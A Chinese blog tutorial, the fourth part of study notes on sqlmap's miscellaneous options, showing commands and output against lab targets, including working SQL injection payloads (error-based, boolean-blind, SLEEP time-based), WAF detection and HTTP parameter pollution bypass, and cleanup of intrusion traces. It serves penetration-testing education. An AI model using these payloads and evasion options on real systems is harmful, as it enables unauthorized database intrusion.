Sqlmap学习笔记(肆)

书接上文

十八、杂项

1.使用简写

参数:-z

有些参数组合是被经常用到的,如“–batch –random-agent –ignore-proxy
–technique=BEU”,这样写一大串很不好看,在Sqlmap中,提供了一种简写的方式来缩短命令长度。

利用参数“-z”,每个参数都可以只写前几个字母,如“–batch”可以简写为“bat”。简写的原则是能够有所区别、对应的参数唯一就行。各个参数用逗号隔开。如:

  python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"

可以简写为:

  python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"

再如:

  python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"      

可以简写为:

  python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"

2.在成功检测到注入点时报警

参数:–alert

该参数用于在找到新的注入点时发出警报,后跟一个用于发出警报的命令,如:

  python sqlmap.py -r data.txt --alert "notify-send '找到漏洞了'"

部分输出如下:

  [18:59:36] [INFO] GET parameter 'couno' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)' injectable (with --not-string="001")
  [18:59:36] [INFO] executing alerting shell command(s) ('notify-send '找到漏洞了'')

上例中用于发出警报的命令是Ubuntu中的notify-send命令。

3.设置问题的回答

参数:–answers

使用“–batch”以非交互模式运行时所有问题都以按默认值作为回答。有时不想以默认值为答案又想使用非交互模式,此时可以使用参数“–answers”对特定问题进行回答,若回答多个问题,以逗号分隔。如:

  python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch

部分输出如下:

  [xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
  [xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N

4.在成功检测到注入点时发出“嘟”声

参数:–beep

使用此参数可以在成功检测到注入点时发出“嘟”声。使用“-m”从日志文件中检测大量网站时该参数会格外有用。

5.清除Sqlmap创建的临时表和自定义函数

参数:–cleanup

强烈推荐在测试结束后使用此参数清除Sqlmap创建的临时表和自定义函数,Sqlmap会尽可能地清除数据库管理系统和文件系统上的入侵痕迹。

6.检查依赖

参数:–dependencies

Sqlmap的有些功能依赖第三方库,在用到时发现没有这些库会报错退出。使用此参数可以检查依赖的第三方库是否安装,如:

  python sqlmap.py --dependencies

部分输出如下:

  [*] starting at 19:16:05

  [19:16:05] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in order to directly connect to the DBMS 'Firebird'. Download from http://kinterbasdb.sourceforge.net/
  [19:16:05] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS 'Sybase'. Download from https://github.com/pymssql/pymssql
  [19:16:05] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in order to directly connect to the DBMS 'Oracle'. Download from http://cx-oracle.sourceforge.net/
  [19:16:05] [WARNING] sqlmap requires 'python-psycopg2' third-party library in order to directly connect to the DBMS 'PostgreSQL'. Download from http://initd.org/psycopg/
  [19:16:05] [WARNING] sqlmap requires 'python ibm-db' third-party library in order to directly connect to the DBMS 'IBM DB2'. Download from https://github.com/ibmdb/python-ibmdb
  [19:16:05] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-party library in order to directly connect to the DBMS 'HSQLDB'. Download from https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
  [19:16:05] [WARNING] sqlmap requires 'python ibm-db' third-party library in order to directly connect to the DBMS 'Informix'. Download from https://github.com/ibmdb/python-ibmdb
  [19:16:05] [WARNING] sqlmap requires 'python-pyodbc' third-party library in order to directly connect to the DBMS 'Microsoft Access'. Download from https://github.com/mkleehammer/pyodbc
  [19:16:05] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS 'Microsoft SQL Server'. Download from https://github.com/pymssql/pymssql
  [19:16:05] [WARNING] sqlmap requires 'python-impacket' third-party library for out-of-band takeover feature. Download from http://code.google.com/p/impacket/
  [19:16:05] [WARNING] sqlmap requires 'python-ntlm' third-party library if you plan to attack a web application behind NTLM authentication. Download from http://code.google.com/p/python-ntlm/
  [19:16:05] [WARNING] sqlmap requires 'websocket-client' third-party library if you plan to attack a web application using WebSocket. Download from https://pypi.python.org/pypi/websocket-client/

  [*] shutting down at 19:16:05

可以看到我缺少的主要是用于连接数据库的第三方库。

7.关闭彩色输出

参数:–disable-coloring

8.指定使用Google dork结果的某页

参数:–gpage

使用参数“-g”时默认默认选择Google dork结果的前100条做注入测试。结合使用此参数,可以指定使用Google dork结果的某页。

9.使用HTTP参数污染

参数:–hpp

HTTP参数污染是绕过WAF/IPS/IDS的一种技术,详情见此处。这一技术针对ASP/IIS和ASP.NET/IIS平台尤其有效。如果怀疑目标受WAF/IPS/IDS保护,可以尝试用此参数进行绕过。

10.彻底检测WAF/IPS/IDS

参数:–identify-waf

Sqlmap可以识别WAF/IPS/IDS以便用户进行针对性操作(如:添加“–tamper”)。目前Sqlmap支持检测30多种不同的WAF/IPS/IDS,如Airlock和Barracuda WAF等。检测WAF的脚本可以在安装目录的waf目录中找到。

下例的目标是MySQL,受ModSecurity WAF保护:

  python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3

部分输出如下:

  [xx:xx:23] [INFO] testing connection to the target URL
  [xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
  [xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
  [xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
  [xx:xx:23] [DEBUG] page not found (404)
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
  [xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')

参数:–skip-waf

默认地Sqlmap会发送虚假的SQL注入playload以试探目标是否有保护措施。如有任何问题,用户可以使用参数“–skip-waf”来禁用这一技术。

11.模仿智能手机

参数:–mobile

有些网站对智能手机和桌面环境的返回是不同的。当需要测试这种网站的智能手机页面时可以设置一个智能手机的User-Agent,或者更简单地,使用此参数,Sqlmap会在执行时询问要模仿成流行的手机中的哪种,如:

  $ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
  [...]
  which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
  [1] Apple iPhone 4s (default)
  [2] BlackBerry 9900
  [3] Google Nexus 7
  [4] HP iPAQ 6365
  [5] HTC Sensation
  [6] Nokia N97
  [7] Samsung Galaxy S
  > 1
  [...]

12.离线模式(仅仅使用会话数据)

参数:–offline

添加此参数,Sqlmap将仅仅使用以前存储的会话数据做测试而不向目标发送任何数据包。

13.在Google dork中展示页面权重

参数:–page-rank

与参数“-g”一起使用,这会使Sqlmap向Google发起更多的请求并展示页面权重。

14.从输出目录中安全移除所有内容

参数:–purge-output

当用户想要安全地删除输出目录中的所有内容时使用此参数。所谓安全删除,不仅仅是删除,而是在删除前先用随机数据覆盖原有数据,甚至对文件名和目录名也进行重命名以覆盖旧名称,所有覆盖工作完成后才执行删除。最后,输出目录中会一无所有。如:

  python sqlmap.py --purge-output -v 3

部分输出如下:

  [*] starting at 19:51:36

  [19:51:36] [DEBUG] cleaning up configuration parameters
  [19:51:36] [INFO] purging content of directory '/home/werner/.sqlmap/output'...
  [19:51:36] [DEBUG] changing file attributes
  [19:51:36] [DEBUG] writing random data to files
  [19:51:36] [DEBUG] truncating files
  [19:51:36] [DEBUG] renaming filenames to random values
  [19:51:36] [DEBUG] renaming directory names to random values
  [19:51:36] [DEBUG] deleting the whole directory tree

  [*] shutting down at 19:51:36

15.快速扫描

参数:–smart

当有大量URL要进行测试(如:“-m”),目的是尽快找出其中存在的某些注入点而有所遗漏也没有关系时可以使用“–smart”进行正向启发式扫描。此时只有让数据库管理系统报错的参数才会做进一步测试,其余URL均被跳过。如:

  $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
  [...]
  [xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
  [xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
  [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
  [xx:xx:14] [INFO] skipping GET parameter 'ca'
  [xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
  [xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
  [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
  [xx:xx:14] [INFO] skipping GET parameter 'user'
  [xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
  [xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
  [xx:xx:14] [INFO] GET parameter 'id' is dynamic
  [xx:xx:14] [WARNING] reflective value(s) found and filtering out
  [xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be
  injectable (possible DBMS: 'MySQL')
  [xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
  do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
  [xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
  [xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  [xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
  [xx:xx:14] [INFO] testing 'MySQL inline queries'
  [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  [xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
  [xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  [xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
  [xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the
  time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  [xx:xx:24] [INFO] target URL appears to have 3 columns in query
  [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
  [...]

16.通过关键词使用或跳过payload

参数:–test-filter

若只想使用包含关键词“ROW”的payload可使用参数“–test-filter=ROW”。下面是以Mysql为目标的例子:

  python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --batch --test-filter=ROW

部分输出如下:

  [xx:xx:39] [INFO] GET parameter ’id’ is dynamic
  [xx:xx:39] [WARNING] reflective value(s) found and filtering out
  [xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter ’id’ might be injectable (possible DBMS: ’MySQL’)
  [xx:xx:39] [INFO] testing for SQL injection on GET parameter ’id’
  [xx:xx:39] [INFO] testing ’MySQL >= 4.1 AND error-based - WHERE or HAVING clause’
  [xx:xx:39] [INFO] GET parameter ’id’ is ’MySQL >= 4.1 AND error-based - WHERE or HAVING clause’ injectable GET parameter ’id’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
  sqlmap identified the following injection points with a total of 3 HTTP(s) requests:
  ---
  Place: GET
  Parameter: id
      Type: error-based
      Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
      Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELECT (CASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FROM (SELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
  ---

参数:–test-skip

若不想使用包含关键词“BENCHMARK”的payload可使用参数“–test-skip=BENCHMARK”。

17.交互式Sqlmap Shell

参数:–sqlmap-shell

使用此参数可以打开一个交互式的Sqlmap Shell,支持历史记录。如:

  werner@Yasser:~$ sqlmap --sqlmap-shell
          ___
         __H__
   ___ ___[.]_____ ___ ___  {1.1.10#stable}
  |_ -| . ["]     | .'| . |
  |___|_  [(]_|_|_|__,|  _|
        |_|V          |_|   http://sqlmap.org

  sqlmap-shell> -u "192.168.56.102"
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

  [*] starting at 20:22:46

  [20:22:46] [INFO] testing connection to the target URL
  [20:22:46] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
  [20:22:46] [INFO] testing if the target URL is stable
  [20:22:47] [INFO] target URL is stable
  [20:22:47] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')

  [*] shutting down at 20:22:47

          ___
         __H__
   ___ ___[.]_____ ___ ___  {1.1.10#stable}
  |_ -| . ["]     | .'| . |
  |___|_  [(]_|_|_|__,|  _|
        |_|V          |_|   http://sqlmap.org

  sqlmap-shell> exit

18.为初学者准备的简单向导

参数:–wizard

Sqlmap特地为初学者准备了一个有着尽可能少问题的工作流的向导。用户输入目标后若一直按回车选择默认回答到工作流的最后也会得到一个正确的结果。如:

  werner@Yasser:~$ sqlmap --wizard
          ___
         __H__
   ___ ___["]_____ ___ ___  {1.1.10#stable}
  |_ -| . [)]     | .'| . |
  |___|_  ["]_|_|_|__,|  _|
        |_|V          |_|   http://sqlmap.org

  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

  [*] starting at 20:39:41

  [20:39:41] [INFO] starting wizard interface
  Please enter full target URL (-u): http://192.168.56.102/login.php
  POST data (--data) [Enter for None]: username=001&password=003
  Injection difficulty (--level/--risk). Please choose:
  [1] Normal (default)
  [2] Medium
  [3] Hard
  > 1
  Enumeration (--banner/--current-user/etc). Please choose:
  [1] Basic (default)
  [2] Intermediate
  [3] All
  > 1

  sqlmap is running, please wait..

  sqlmap resumed the following injection point(s) from stored session:
  ---
  Parameter: username (POST)
      Type: boolean-based blind
      Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
      Payload: username=001%' OR NOT 2143=2143#&password=003

      Type: AND/OR time-based blind
      Title: MySQL >= 5.0.12 OR time-based blind (comment)
      Payload: username=001%' OR SLEEP(5)#&password=003
  ---
  web server operating system: Linux Ubuntu
  web application technology: Apache 2.4.7, PHP 5.5.9
  back-end DBMS operating system: Linux Ubuntu
  back-end DBMS: MySQL >= 5.0.12
  banner:    '5.5.50-0ubuntu0.14.04.1'
  current user:    'root@localhost'
  current database:    'DSSchool'
  current user is DBA:    True

  [*] shutting down at 20:40:07

总结

完整阅读Sqlmap官方手册后终于对Sqlmap有了一个较为全面的认识。以前只是有所耳闻,现在切实地感受到了Sqlmap的强大,也愈加敬佩Sqlmap的两位作者:

参考文献

  1. sqlmap官网
  2. SqlMap用户手册
  3. sqlmap批量扫描burpsuite请求日志记录
  4. How to get past the login page with Wget?
  5. 笔记: Data Retrieval over DNS in SQL Injection Attacks

5 Replies to “Sqlmap学习笔记(肆)”

  1. Hello!
     
    My name is Roy. I wanted to ask do you accept sponsored articles or a link placement in the existing articles on your website? If you do, what are your rates?
     
    Kind regards,
    Roy

回复 Natalia Spradling 取消回复

您的电子邮箱地址不会被公开。 必填项已用*标注

17 − 16 =